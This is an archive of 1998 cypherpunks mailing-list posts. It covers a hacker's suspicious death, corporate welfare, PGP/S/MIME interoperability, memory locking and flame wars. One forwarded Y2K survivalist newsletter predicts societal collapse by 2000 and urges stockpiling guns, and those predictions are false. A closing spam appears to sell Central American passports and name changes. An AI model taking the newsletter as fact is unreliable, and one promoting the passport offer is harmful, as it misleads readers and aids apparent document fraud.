NDS apparently wasn't the only one interested in Floriciz.

His father says Floriciz talked several times about being approached by people
he suspected worked for spy agencies, which are believed to have mined the
hacker
world for talent in the past.

Just a few months ago, Germany's spy agency tried to hire a hacker to get
secrets out of Iran's military computers, the Chaos club said. But the contact
vanished
when the hacker got Chaos involved.

Floriciz may also have attracted black marketeers of counterfeit chips for
telephone cards and mobile phones. Deutsche Telekom estimates it loses millions
of
dollars each year from counterfeit cards. And industry officials worry that TV
decoder chips offer gangsters even bigger profits on the black market.

Money wasn't a lure for Floriciz, his friends say. He preferred to post his
research on the Internet for all to see -- and use.

"It was all the same to him if others raked in the bucks from what he
developed," one friend, Daniel, told Stern. "The main thing for him was that he
had proven what
he was great at."

Mueller-Maguhn says Floriciz's open attitude about his work might have
threatened those who didn't want competitors horning in on their business.

"He had lots of jobs, but he didn't want to become a slave of one company," he
said. "Maybe that was a problem."

Floriciz left his mother's apartment on Oct. 17 at about 2 p.m. She didn't think
he'd be gone long, because he didn't take his laptop computer.

He never came back. Calls to his mobile phone went unanswered.

A passerby found his body five days later. His phone, keys, ID card and money
were with him, evidence police say points to suicide. No sign of a struggle.
Nothing
stolen. No drugs.

Detectives are waiting for test results -- fingerprint fragments or chemical
traces -- before making a final determination.

The Chaos Computer Club is putting together its own report, which it plans to
release at its annual convention Dec. 27-29 in Berlin. Already, the death notice
on
the club's Web site states what Floriciz's friends believe happened:

"The circumstances under which he disappeared and his extraordinary capabilities
lead us to the conclusion that he became a homicide victim."

By PAUL GEITNER, Associated Press Writer 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 29 Nov 1998 07:34:12 +0800
To: cypherpunks@cyberpass.net
Subject: govt/business incest
Message-ID: <199811282300.PAA20157@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



on the incestuous relationship between govt and business...
heh doesn't mention the DEFENSE industry, #@&%^*
also for anyone interested, noam chomsky has many good
books out on these subjects


------- Forwarded Messagone

Subject: 
        [exploration] Corporate Welfare: A Media Issue At Last? (fwd)
   Date: 
        Sat, 28 Nov 1998 08:24:26 -1000
   From: 
        Jonathan David Boyne <boyne@hawaii.edu>
     To: 
        Undisclosed recipients:;



By Norman Solomon  /  Creators Syndicate


     For many years, across the United States, huge quantities of
>tax breaks and subsidies have been going to corporations.
>Occasionally, the media spotlight falls on an example of how
>government policies stand Robin Hood on his head -- shaking down
>the poor and middle class while handing over the proceeds to
>wealthy individuals and big businesses.
>
>     Sometimes called "corporate welfare," this pattern of
>legalized rip-offs has been widespread -- yet little of the story
>seems to emerge in major news outlets. Overall, the coverage is
>sporadic at best. In mass media, the broader picture has been
>missing -- until the last few weeks.
>
>     November brought a series of breakthroughs, thanks to two
>gifted reporters and a news weekly that allowed them to engage in
>rigorous journalism. All month, beginning with a cover story on
>"What Corporate Welfare Costs You," Time magazine featured
>extraordinary exposes by Donald Barlett and James Steele.
>
>     Corporate welfare, they write, is "a game in which
>governments large and small subsidize corporations large and
>small, usually at the expense of another state or town and almost
>always at the expense of individuals and other corporate
>taxpayers."
>
>     Barlett and Steele report that "the federal government alone
>shells out $125 billion a year in corporate welfare." Meanwhile,
>"a different kind of feeding frenzy is taking place" at the state
>and local level -- where "politicians stumble over one another in
>the rush to arrange special deals for select corporations."
>
>     In theory, the giveaways create jobs. In practice, the
>theory is hogwash: "Time's investigation has established that
>almost without exception, local and state politicians have doled
>out tens of billions of taxpayer dollars to businesses that are
>in fact eliminating rather than creating jobs."
>
>     Often, when localities roll out the gold carpet for firms,
>government coffers shrink -- and services for the public
>diminish. As Barlett and Steele document in excruciating detail,
>one of the common results is health-threatening pollution that
>goes unchallenged. The most vulnerable neighborhoods tend to be
>where low-income people live.
>
>     The big hogs at the tax-funded trough include popular brands
>-- Intel and Dow, General Motors and Mercedes-Benz, Exxon and
>Shell, UPS and Procter & Gamble, to name just a few. Some are the
>parent companies of media empires, such as Walt Disney (ABC),
>General Electric (NBC) and -- as the Time series acknowledges --
>Time Warner.
>
>     "The king of corporate welfare may be Archer Daniels
>Midland," according to Time. "The global agricultural-commodities
>dealer has artfully preserved one of the more blatant welfare
>programs -- a subsidy for ethanol that has already cost taxpayers
>more than $5 billion in the 1990s. Some $3 billion of that has
>gone to ADM."
>
>     Year after year, Archer Daniels Midland has poured several
>million dollars into the nightly PBS "NewsHour" television show
>hosted by Jim Lehrer. ADM is also an underwriter of National
>Public Radio news. And the savvy firm buys a lot of image ads on
>commercial TV network programs that discuss political issues. Not
>surprisingly, ADM hasn't been subjected to much tough reporting
>on the national airwaves.
>
>     Corporate welfare is an important issue. But it can easily
>be spun in dubious directions. For instance, in an article
>addressed "To Our Readers," Time's editor-in-chief Norman
>Pearlstine throws a wide curve that breaks sharply downward and
>to the right.
>
>     "Ending corporate welfare as we know it is essential,"
>Pearlstine contends. But then comes the english: "Rather than
>give corporations uneven and unfair exemptions, it may make more
>sense to simply do away with both corporate welfare and corporate
>taxation."
>
>     Now there's an idea that Time Warner can get behind: Stop
>taxing corporations!
>
>     Another hazard is the temptation to put all forms of
>government assistance in the same "welfare" category. It would be
>a big mistake to equate government aid to dependent corporations
>with safety-net subsidies for children, seniors and others
>struggling at the bottom rungs of the economic ladder.
>
>     Government should not be using tax dollars to help the rich
>get richer. But government has no business refusing to help
>Americans get the nutrition, health care, housing and other
>basics that are everyone's human right.
>
>     Welcome as it is, the occasional blockbuster expose of
>corporate abuses -- even in a media outlet as influential as Time
>magazine -- won't accomplish very much. Without an "echo effect,"
>these issues are likely to remain muted.
>
>     The need to speak up and take action is a burden that falls
>on people in every community. Large corporations have been
>ripping us off for decades. Our initial efforts to force
>restitution will not be televised.
>
>
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com
>
>DECLARATION & DISCLAIMER
>==========
>CTRL is a discussion and informational exchange list. Proselyzting
propagandic
>screeds are not allowed. Substance-not soapboxing!  These are sordid
matters
>and 'conspiracy theory', with its many half-truths, misdirections and
outright
>frauds is used politically  by different groups with major and minor
effects
>spread throughout the spectrum of time and thought. That being said, CTRL
>gives no endorsement to the validity of posts, and always suggests to
readers;
>be wary of what you read. CTRL gives no credeence to Holocaust denial and
>nazi's need not apply.
>
>Let us please be civil and as always, Caveat Lector.
>
>========================================================================
>To subscribe to Conspiracy Theory Research List[CTRL] send email:
>SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM
>
>To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
>SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM
>
>Om
>

- - ------------------------------------------------------------------------
Don't lose your email when you move, change jobs, or switch ISP's.
Click here to get free and permanent email from NET@DDRESS!
http://ads.egroups.com/click/153/0

Free Web-based e-mail groups -- http://www.eGroups.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Sat, 28 Nov 1998 12:09:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: open-pgp / s/mime interoperability
Message-ID: <91222019014234@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain





>: there is no reason why you can't have PGP
>: messages backed by X.509 certificates, and it is trivial to use S/MIME
>: with OpenPGP certificates.  I'm planning on writing a short
>: informational RFC on how to do it once we all get RFC numbers for our
>: respective systems.

>open-pgp public keys aren't based on X.509 keys, so I would've thought
>s/mime implementation would barf on them.  

Actually S/MIME *could* support the use of PGP keys, but there's a field
(the SubjectKeyIdentifier) missing from the CMS SignerInfo which prevents
this.  This is rather inconsistent, because the same field is present in
the RecipientInfo.  I'm currently arguing in favour of adding it to 
SignerInfo on the basis that any argument against it would also apply to
RecipientInfo.  Not sure whether it'll work though - a couple of list
members seem convinced that exactly the same thing which is currently in
RecipientInfo won't work if used in SignerInfo.

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 29 Nov 1998 00:57:58 +0800
To: cypherpunks@cyberpass.net
Subject: native onani
Message-ID: <199811281632.RAA12035@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 07:24 AM 11/27/98 -0500, Robert Hettinga wrote:
> Obviously
>neither homosexual nor homophobic, both groups
>prefer the chaste option of onani (onanism) to the perceived compromises of
>marital consummation.


Worse than that, they use a geijing word for masturbation...



--If the spice girls mud-wrestled shonen knife, who would win?










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 29 Nov 1998 01:12:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
Message-ID: <199811281641.RAA12739@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate misses the point, as usual:

> Wrong, since the ENTIRE OS is run under this it's not nearly that simple.
> The OS's internal swap page as well as by extension the contexts they point
> to are going to be sitting in there. The app should also encrypt the address
> spaces of the system structures.

The original message said:

> From: "Jim Adler" <jadler@soundcode.com>
> The SCNSM driver supports allocation of non-swappable memory on Windows
> 3.x/95/98. The principal design goal of SCNSM is to provide memory that will
> not be swapped to disk, under any circumstances. Typically, security
> applications require such memory to store private keys, passwords, and
> sensitive intermediate results of cryptographic calculations.

What is Choate thinking when he says the ENTIRE OS is run under this?
This is a driver which is used by the application to allocate specific
memory buffers in non-swappable memory.  It allows the app to lock down
those buffers so that they won't swap to disk.  These buffers can then
be used to hold sensitive data.

It is neither possible nor desirable to run the ENTIRE OS out of
such buffers.  It is not possible because the OS is already written.
It is Windows 3.x/95/98 (see above).  That OS does not make the special
driver calls which would be necessary to allocate non-swappable memory.
You would have to rewrite Windows to use the special calls, which isn't
possible for a luser like Choate.

And it's not even desirable.  There is no reason to make the ENTIRE OS
use non-swappable memory.  Most memory is simply not that sensitive.
It holds public data, or data which is already on the disk in some form.
Putting the ENTIRE OS into non-swappable memory gives up much of the
advantage of having virtual memory in the first place.  It would be a
giant step backwards in OS architecture.

Here's what Choate had to say when Bill Stewart tried to politely help
him out:

> You don't know this but you're willing to try to rake me....
> Talk about unprepared.
> Your guess is pretty much worthless.

It's bad enough to have to endure more of Choate's idiocy, but it is
especially offensive to see him hassling Bill Stewart, one of the most
consistently informative and valuable list members.  Bill's a thick-
skinned guy and it's probably no big deal to him, but it further
illustrates what a negative contribution Choate makes here.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 29 Nov 1998 11:28:51 +0800
To: cypherpunks@cyberpass.net
Subject: y2k/gary north delusions
Message-ID: <199811290304.TAA06582@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been reading gary north for quite awhile and think
he is quite brilliant on some issues. for example he was
quoting statistics about amt of time it takes to fix code,
cost per line, govt agencies etc. a long, long time ago.
he really zeroed in on the govt bureacrat "ostrichism"
early on.. 

anyway I hate to say that I think he is really losing his
mind lately.. no there are going to be some serious y2k problems,
but imho the bottom approaches "garbage".. any talk of riots,
mobs, martial law, stockpiling weaponry, roving bandits
etc. seems to me to be really way off base to say the least.
now people have been talking about this, but I've never seen
gary north go quite that crazy.

all the quoting of obscure, fictitious b-grade movies in this article
makes me think he is really living in a fantasy world. now
this is a shame because some of his research is some of the
most solid and ahead-of-time than anyone on the entire net,
by far. his site is a work of art in tedious archival,
compilation, indexing.

gary, take it easy. take a vacation. take a deep breath.

well posted for your own opinion

------- Forwarded Message


Gary North's REALITY CHECK
Issue #33
November 17, 1998


       CLOCKS TICK, BUT MOST PEOPLE IGNORE THE SOUND


     Tonight we will go through the Leonid meteor shower. 
Scientists tell us that this one will not match the 1966
shower, nor will it match the one a year and a day from
now.  But we will probably lose a few major satellites. 
Any company that has insured satellites has just entered a
higher-risk period.

     Astronomy is a precise science.  It can predict events
such as this one with remarkable accuracy.  The astronomers
do not know how intense this shower will be, but they know
for certain that tonight will be the highest density night. 
Some think it will be a bump in the highway, but others
think it could be worse for our satellites.  This reminds
me of y2k forecasts.

     I shall go out tonight to see the shooting stars.  I
was on top of a hill in a desert area in 1966, lying on the
trunk of a car, looking up.  I did not know about the
Leonids.  I just happened to be in the right place to see
them.  The shooting stars came every few minutes.  Never in
history had there been so many -- and records of the
Leonids go back to the tenth century.  I'll never forget
it.  I'll never forget y2k, either.


                   IGNORING THE OBVIOUS

     There are millions of people who know that y2k is
coming.  They will put this out of their minds until the
last minute.  They will pay no attention until events force
themselves on men's perception.  Then they will say, "Why
didn't anyone tell me?"  There are several answers: (1) the
watchmen did not believe the evidence; (2) risks to the
reputations of watchmen are high and rewards are few; (3)
almost no one would have listened anyway.

     Let me give another example.  I have mentioned in
"Remnant Review," but not on my Web site, since it is not a
y2k issue.  But it is surely an ignored deadline issue. 
Brady II goes into effect in just a few days: December 1. 
>From that day forward, U.S. residents will not be able to
buy a shotgun or a rifle without registering and paying a
fee.  Their names will be placed in an FBI computer, even
though this is illegal and the authorities know it's
illegal.  Where is the ACLU?  If this law applied only to
Blacks, the ACLU would be fighting it.  But since it
applies to everyone, we hear nothing.  

     There is a scene in "The Trigger Effect" where the two
male characters go into a gun store a few days after the
power has been off.  So do a lot of others.  They are told
that they cannot buy handguns.  There is a waiting period. 
But they can buy rifles and shotguns.  They buy a shotgun
with what little cash they can scrape together.

     As of December 1, this scene will be inaccurate. 
There will be an extra fee and the loss of privacy.

     The next step: a prohibition on private gun sales.  To
sell your gun to your next door neighbor, you will have to
take your gun to a gun dealer, who will register the
transaction and impose the 5-day waiting period.  The
President has said that it is his goal to shut down gun
shows.  I think he will be successful.

     Now, I'm not too worried about being in any computer. 
They will all be dead on 1/1/2000.  But what is obvious is
that those who dilly-dally now will find themselves
competing with people who have cash in 2000.  The collapse
of the banks over the next 16 months will transfer wealth
to the drug dealers on a massive scale.  They will have
cash, and they will be dealing in consumer goods that will
function as money.  Drugs are divisible, recognizable to
users, have a very high value-to-volume ratio, and are
durable.

     There is no doubt in my mind that in those
geographical areas where addiction is high, the drug lords
will take over the functions of government.  They will be
armed.  They will have money.  They are ruthless.  And the
police will be absent.  The inner cities of the United
States will become warlord societies within two years.

     Do not live anywhere near one of these areas.  The
criminals and addicts will fan out to extract wealth from
contiguous areas.  The police will be hard-pressed to
respond.  It will take time for martial law to be imposed,
and in most places, there will not be any military
presence.  Neighborhood defense will be based increasingly
on what local residents can muster.  If the locals are
disarmed, then they will be sitting ducks.  

     Neighborhoods will set up roadblocks with cars.  The
two-car family will become a one-car family.  The number-
one defensive measure a neighborhood can take is a
roadblock.  Criminals will have to get into a neighborhood
on foot.  They will have to get out the same way.

     Easy transportation will disappear in 2000.  Urban
life will move to a crawl.  On that day, you had better
have your water, your food, your non-hybrid seeds, and your
ammunition.

     Nobody else talks like this.  The watchmen are in the
"peace, peace" mode.  That's easy talk in the days before
the shooting starts.  The function of the watchman in the
Old Testament was military.  He warned of an invading army. 
That's what I'm doing.  The army has already invaded the
central cities.  It is well armed, well organized, and
ruthless.  It will move outward in 2000.

     Rent "The Friendly Persuasion."  It's a great movie. 
Pay close attention to the pacifism of the Quaker men in
the weeks before the Confederates invaded and the
militarism on the day before.  Talk of peace is cheap
before the shooting starts.

     What I am saying is obvious, but it is not politically
correct.  Today's watchmen are afraid of politically
liberal media reporters who might say, "These people
recommend buying guns!  Oh, woe!  Oh, horrors!"  I pay no
attention.  When I think of any reporter, I think: "Dead
man typing."  He will have no job, no career, no pension,
and no readers in 15 months.  He will be at the mercy of
those around him.  

     The mentality of the typical reporter is that of the
wife on "the Trigger Effect."  A liberal to the core, she
wanted no part of a shotgun.  The movie centers around her
ideology and the costs that it imposed.  It was not a good
movie, but it surely did portray her in a bad light, which
was well deserved.

     The clock is ticking.  Brady II is coming.  And
millions of people will walk into a Wal-Mart SuperCenter
next month and through all of next year and wonder: "Why
didn't someone tell me I would have to register this
transaction?"  (See the three reasons, above.)


                     ACROSS THE BOARD

     The shock of recognition that rifle-buyers will have
in the next few months will be paralleled in 1999 on an
international scale.  "What do you mean, I can't get cash
out of this bank?"  "What do you mean, you're out of solar
panels?"  (http://www.solarextreme.com)  "What do you mean,
I can't buy an inverter?"  "What do you mean, I can't get
delivery of a diesel generator?"  "What do you mean, you
don't have any deep cycle golf cart batteries?"  "What do
you mean I can't get delivery of a wood burning stove?"

     In 2000, it will be food, water, and electricity.  But
there will be no seller to complain to.  To complain, you
have to be able to speak to someone.  You won't be able to.

     Let's start with the basics: water.  An urban adult
uses 75 to 100 gallons of water a day.  This doesn't count
watering the lawn.  In 2000, how many people will be under
your roof?  Remember, your children may show up on your
doorstep, with wives and children.  Families will pull
together for survival in 2000.  Estimate the number of
people under your roof in 2000.  Now, how much water will
you need per day?

     What if the municipal water authority shuts down? 
It's goodbye showers.  Goodbye flushing toilets.  Hello sponge
baths and thunder mugs.  I don't think the reality of the
power cut-off will hit most families until someone says,
"Mom, the toilet won't flush."  Then the realization will
dawn at last.  A new, unpleasant world has arrived.

     Disease will begin to spread by the end of the week.

     Every time you take a shower, think of 2000.  Every
time you flush a toilet, think of 2000.  Ask yourself: How
will I do this in 2000?

     People will not do this.  No, not even those who have
read my warnings for two years.  They will not go through
the mental exercise of planning ahead for the basics -- and
water is near the top of any list of basics, right below
heat in the winter.

     There are millions of people who live in high-rise
apartments today.  There will be fewer in February, 2000.

     Let's assume that for the first three months in 2000,
you will not get paid.  The banks will be down.  You will
not be able to write a check or use a credit card.  What
will you do?

     What will your neighbors do?

     What if it's a year?

     If it's a year, it could be a decade.

     What will you do?  What is your exit strategy?

     Have you and your spouse sat down with pencil and
paper and written down your family's exit strategy?  No? 
Why not?  It's not that I haven't nagged you.

     What of your adult children?  Which ones will be able
to make it through three months of no paychecks?  Of those
that can't, how many will wind up on your doorstep in late
1999?  Or will you wind up on theirs?

     Should you head for the hills?  Wrong question.  What
solid evidence do you have that you shouldn't?

     Should you stay where you are?  What items will you
need in your possession in 2000 and 2001 to make your
decision to stay put a wise one for you and all of your
closest relatives, who will show up on your doorstep if
they know that you have prepared?  That is to say, have you
prepared for every close family member who will be in
trouble in 2000?  No?  Why not?

     The clock is ticking.

     Let me give a simple example.  How will you wash
clothes for everyone?  Let's assume that you have water. 
(Dreamer!)  You can buy a 40-lb. tub of Wind Fresh laundry
detergent from Sam's Club for $10.  It will do 160 loads. 
For one person, that's a year of washing.  What if you have
10 people under your roof?  You will need 10 tubs for just
one year.  But this product may not be readily available in
2001.  You had better buy 20 tubs.  I'll bet you don't have
20 tubs, even though you can afford $200.  You lack the
storage space.  More important, 20 tubs of detergent point
to all the other things you will need under conditions that
would mandate 20 tubs of detergent.  So, people refuse to
buy enough detergent.

     Now, what about your neighbors?  They will be dirty. 
Their clothes will be dirty.  You will be clean.  You will
not have lost 30 pounds.  You will be the target of envy on
a scale you can barely imagine today.  You will be
despised.  Will you be ready for this psychologically?

     Of course, you can warn your neighbors now.  They will
not prepare, but they will remember.

     There will be a stream of beggars at your door from
2000 onward.  You may know their names.  "Please, please,
we're desperate."  It won't be a lie.

     When a society loses the division of labor, it loses
just about everything that the urban "good life" requires. 
If you keep even a fraction of these things -- clean
clothes, for instance -- you will be resented.  Envy is a
powerful force.  "He doesn't deserve it.  It's not right
that he should have so much.  No one should have so much."

     Here is a piece of information you may not have. 
Sam's Club offers a special service.  It has a 50-page
notebook with all of its products listed, with order
numbers.  Go to the manager and ask for a copy.  Take it
home.  Make a shopping list.  You can order everything at
one time.  Rent a U-Haul or borrow a pick-up truck and pick
up everything.

     The average adult consumes 1000 lbs of food for a year. 
Half should be vegetables.  You can grow them.  Buy
non-hybrid seeds.  (http://arkinstitute.com)  Half 
can be grains.  You can buy 200 lbs of white rice at Sam's
Club for under $60.  The same for pinto beans.

     In terms of food, $300 will feed you for a year. 
You'll hate the taste by mid-2000, but you'll eat.  How
many of you will spend a whole $300 on food?  Not many. 
Why not?  Because if they might need this much food,
they'll need water, and they know they can't get enough
water in 2000.  They would have to move, or put in four
1,500-gallon cisterns and gutters, or buy a swimming pool. 
They won't do it.

     My suggestion: rent "The Trigger Effect."  Then make
up your mind about where you should live in 2000.

     For those who want a public presentation, which can be
used to persuade people who have not read much about y2k,
my Harrison, Arkansas y2k town meeting tape is effective. 
You can see representatives of the public utilities and a
local bank deal with y2k.  The question and answer session
is especially useful.  It sells for $39.95: 
call 903-839-8822.

- - --------------------------------------------
Reality Check
- - --------------------------------------------
To unsubscribe from this list, send a message containing 
"unsubscribe" to: remnant-list-request@cliffslanding.com

If you have questions please contact ice@ballistic.com.


- - --------------60B23B773DFEE8A7DA22A23D--


- - --------------12214D0997E9CA46C4BB380C--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 29 Nov 1998 04:12:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Pi(x) - How many primes below x?
Message-ID: <199811281943.UAA27500@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Here are a couple of overdue Choate blooper corrections.

Regarding the Prime Number Theorem, Choate originally wrote:

> I had typed x/ln(x) as the asymptotic limit for the number of primes less
> than x.
> 
> This is incorrect. It should be,
> 
> x/log(x)

It should be noted that ln(x) is the logarithm to the base e of x.
log(x) is somewhat ambiguous as to the base, but when it is contrasted
with ln(x) as Choate does here, it implies that the base is 10.  In
fact the correct formula uses the base e, and x/ln(x) is not "incorrect"
as Choate is claiming.

When Choate's error was pointed out, he responded by quoting
http://www.utm.edu/research/primes/howmany.shtml, which says that the
formula is x/log x.  What Choate failed to notice is that the web page
clearly states that its logs are to the base e.  In other words, the
"log x" on that page is equivalent to the "ln(x)" which Choate originally
wrote.  Choate's original formula was the right one, and in writing that
his formula was incorrect, he only displays his own confusion.


With regard to his ludicrous model of a spark gap inside a conductive
sphere, Choate originally wrote:

> The spark gap generates sparks and that builds up free electrons in the
> space inside the sphere (whether it is gas filled or a vacuum is
> irrelevant). As that charge builds up it will be all of one type, electrons.
> Now the electrons repel each other and therefor move in a circular motion
> with the spark gap as the center. They strike the surface of the sphere and
> tunnel through to the outside surface where they reside. The amount of
> charge at any one point is related to the curvature of the surface at that
> point. Since a sphere is constant curvature the charge will be evenly
> distributed. It will continue to build up so long as you supply power to the
> spark gap. In an ideal world it will get bigger and bigger. In the real
> world at some point insulation breaks down and normal current flow takes
> place.

He believes that the spark gap emits electrons, which strike the inside
surface of the sphere and "tunnel through" to the outside.  He says that
the charge will continue to build up so long as you supply power to the
spark gap.

Here is another message in which he made the same point:

> This is in addition to the charge that steadily builds up in the shell as
> the electrons accrete over time. This can be modelled with an integral of
> the flow rate of the current in the battery (it after all is Coulombs/s).
> It's not too hard (k * I). (I'm not going to go into what happens as the
> charge on the shell builds up as we're discussing here the applicability of
> wave equations as a reliable model).
> 
> So what do you get? A hell of a charge that will go bang at some point when
> some insulation give way.

When it was pointed out how ignorant this idea was, and how it violates
Gauss's Law, Choate tried to backpedal by proposing that the battery
itself was charged in the first place.  He even drew a picture:

>                2N e-          1N p+
>
>                     |       |
>                     |       |
>       |-------------|       |--------------|
>       |             |       |              |
>       |             |       |              |
>       |                                    |
>       |                                    |
>       |------0 0------------------0     0--|
>                                    \
>                                      \
>           spark gap               switch

It should be obvious that this device fails to generate the phenomena which
he describes above.  In the first place, since it has a net negative
charge, the charge will appear on the outside of the sphere BEFORE THE
SWITCH IS THROWN.  There is no spark active, no electrons being emitted,
yet a negative charge appears on the outside of the conductive sphere.
This is an elementary application of Gauss's Law.

Then, when the switch is thrown, there will be a spark, and some of
the charges will neutralize each other, but of course the net charge
will stay the same, by conservation of charge.  The phenomenon Choate
described of electrons being emitted by the spark gap, moving outward
and striking the sphere, and then tunnelling through to make charge
appear on the outside, will occur only in Choate's deluded imagination.

Furthermore, there will be no "build up" of charge.  The charge will be
there from the moment the device is put into the sphere, long before
the switch is thrown.  Throwing the switch will have NO EFFECT WHATSOEVER
on the outside of the sphere.

Michael Motyka spent several days trying to patiently explain all this
to Choate, to no avail.  He finally gave up in frustration.  Choate is
almost completely immune to enlightenment.  He has certainly proved that
patience and politeness make no dent in his thick skull.  We shall see
whether blunt frankness is any more effective.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 29 Nov 1998 13:00:56 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
Message-ID: <199811290431.WAA05894@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 28 Nov 1998 23:26:46 +0000
> From: "Frank O'Dwyer" <fod@brd.ie>
> Subject: Re: Securing data in memory (was "Locking physical memory (fwd)

> Jim Choate wrote: 
> > If I had 2 of the Samsung 4G memory modules w/ battery back-up I could run
> > an entire machine without a hard-drive.
> 
> If you had no hard drive why the hell would you worry about disk
> swapping?

I wouldn't because I'd have enough RAM to cover the requisite resources of
my OS and apps.

You have the cart before the horse.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sun, 29 Nov 1998 07:51:16 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <199811281827.MAA04760@einstein.ssz.com>
Message-ID: <366086B6.2E880D74@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote: 
> If I had 2 of the Samsung 4G memory modules w/ battery back-up I could run
> an entire machine without a hard-drive.

If you had no hard drive why the hell would you worry about disk
swapping?

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 29 Nov 1998 06:40:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: native onani
In-Reply-To: <199811281632.RAA12035@replay.com>
Message-ID: <3.0.5.32.19981129071146.00881b40@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 05:32 PM 11/28/98 +0100, Anonymous wrote:
>
>At 07:24 AM 11/27/98 -0500, Robert Hettinga wrote:
>> Obviously
>>neither homosexual nor homophobic, both groups
>>prefer the chaste option of onani (onanism) to the perceived compromises of
>>marital consummation.
>
>
>Worse than that, they use a geijing word for masturbation...
>
>
>--If the spice girls mud-wrestled shonen knife, who would win?
>

Vince McMahon.





Reeza!

	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.

				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 30 Nov 1998 09:04:21 +0800
To: "Brown, R Ken" <cypherpunks@cyberpass.net
Subject: Re: Evil Bandwidth Plot Exposed
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F85CB@MSX11002>
Message-ID: <3.0.5.32.19981128000814.008f6cb0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:40 AM 11/27/98 -0600, Brown, R Ken wrote:
>We're still getting clueless people forwarding us email virus hoaxes.
>Pen-Pal, Buddy Frogs, Good Times, whatever.
>
>And I just realised who has to be responsible!  Who has a motive for this
>"crime"?  These things do no-one any real harm, they just take up
>bandwidth.  Networks get saturated and maybe we have to buy more kit. It
>must be the router manufacturers. Maybe there is a secret team at Cisco or
>IBM generating new  hoaxes  to keep the email market growing.

A long time ago, in a network far far away, when there were wolves in Wales
and Netnews still mostly ran over UUCP instead of that newfangled Arpanet, 
and the Center of the Earth was either allegra or ihnp4, there were
some people who accused Bell Labs and probably in particular Mark Horton
of spreading Netnews as part of a plot by The Phone Company to increase
telephone usage, since more netnews volume meant more long-distance minutes.

(Everybody tried to avoid knowing what the phone bills for
allegra and ihnp4 _were_, because even internal funny-money creates
some responsibility if you know you're spending more than $1M/year of it :-)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "" <helper1@privacy-consultants.com>
Date: Mon, 30 Nov 1998 06:24:28 +0800
To: cypherpunks@toad.com
Subject: Passport Guatemala/Nicaragua now even faster/2-3 weeks!
Message-ID: <199811292130.NAA01216@privacy-consultants.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello fellow Privacy Seeker,

Sorry, it took a little longer to respond, as I just came back from my trip to Central America. I made the first deliveries, and both programs run very well. As we are getting into the christmas season things are getting somewhat busy. Please read below all additional expalanations and act accordingly. 

Some general guidelines, organized like a FAQ:

1. What is included?
Gua: passport with entry-exit stamp of another Central American country, driver's license and cedula
Nica: passport with exit stamp, driver's license and cedula

2. What is extra?
Gua: name change 3000, naturalization papers 1500
Nica: name change 2000, naturalization papers 1000

3. Special features:
Holders are entitled to naturalization in Spain after only two years' residency. This is valid for both countries.

4. Discounts available?

As this is already a real bargain and is addressed to agents only, I will grant a 15% on orders of 2 or more GIVEN AT THE SAME TIME.

5. What is needed?

Gua: 
 Possible by mail:		YES
 Validity of pp:              VALID FOR LIFE
 Prolongation:                EVERY 5 YEARS (AT ANY Guatemala EMBASSY OR CONSULATE)
